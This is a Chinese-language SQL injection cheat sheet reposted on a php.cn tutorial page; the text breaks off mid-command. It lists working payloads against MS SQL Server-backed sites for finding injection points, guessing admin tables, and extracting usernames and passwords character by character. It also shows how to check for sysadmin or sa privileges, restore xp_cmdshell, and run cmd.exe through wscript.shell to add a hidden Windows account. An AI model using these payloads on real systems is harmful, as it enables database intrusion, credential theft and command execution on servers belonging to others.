Heim > Datenbank > MySQL-Tutorial > Hauptteil

常用SQL注射语句解析_MySQL

WBOY
Freigeben: 2016-06-01 13:51:13
Original
975 Leute haben es durchsucht

bitsCN.com

   SQL注射语句
  1.判断有无注入点

  ' ; and 1=1 and 1=2

  2.猜表一般的表的名称无非是admin adminuser user pass password 等..

  and 0(select count(*) from *)

  and 0(select count(*) from admin) ---判断是否存在admin这张表

  3.猜帐号数目 如果遇到0

  and 0

  and 1

  4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称。

  and 1=(select count(*) from admin where len(*)>0)--

  and 1=(select count(*) from admin where len(用户字段名称name)>0)

  and 1=(select count(*) from admin where len(密码字段名称password)>0)

  5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止

  and 1=(select count(*) from admin where len(*)>0)

  and 1=(select count(*) from admin where len(name)>6) 错误

  and 1=(select count(*) from admin where len(name)>5) 正确 长度是6

  and 1=(select count(*) from admin where len(name)=6) 正确

  and 1=(select count(*) from admin where len(password)>11) 正确

  and 1=(select count(*) from admin where len(password)>12) 错误 长度是12

  and 1=(select count(*) from admin where len(password)=12) 正确

  6.猜解字符

  and 1=(select count(*) from admin where left(name,1)='a') ---猜解用户帐号的第一位

  and 1=(select count(*) from admin where left(name,2)='ab')---猜解用户帐号的第二位

  就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了

  and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --

  这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.

  看服务器打的补丁=出错了打了SP4补丁

  and 1=(select @@VERSION)--

  看数据库连接账号的权限,返回正常,证明是服务器角色sysadmin权限。

  and 1=(Select IS_SRVROLEMEMBER('sysadmin'))--

  判断连接数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA)

  and 'sa'=(Select System_user)--

  and user_name()='dbo'--

  and 0(select user_name()--

  看xp_cmdshell是否删除

  and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND

  name = 'xp_cmdshell')--

  xp_cmdshell被删除,恢复,支持绝对路径的恢复

  ;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--

  ;EXEC master.dbo.sp_addextendedproc

  'xp_cmdshell','c:/inetpub/wwwroot/xplog70.dll'--

  反向PING自己实验

  ;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec

  sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--

  加帐号

  ;DECLARE @shell INT EXEC SP_OACreate 'wscript.shell',@shell OUTPUT EXEC

  SP_OAMETHOD @shell,'run',null, 'C:/WINNT/system32/cmd.exe /c net user

  jiaoniang$ 1866574 /add'--

  创建一个虚拟目录E盘:

  ;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod

  @o, 'run', NULL,' cscript.exe c:/inetpub/wwwroot/mkwebdir.vbs -

 

bitsCN.com
Verwandte Etiketten:
Quelle:php.cn
Erklärung dieser Website
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn
Beliebte Tutorials
Mehr>
Neueste Downloads
Mehr>
Web-Effekte
Quellcode der Website
Website-Materialien
Frontend-Vorlage
Über uns Haftungsausschluss Sitemap
Chinesische PHP-Website:Online-PHP-Schulung für das Gemeinwohl,Helfen Sie PHP-Lernenden, sich schnell weiterzuentwickeln!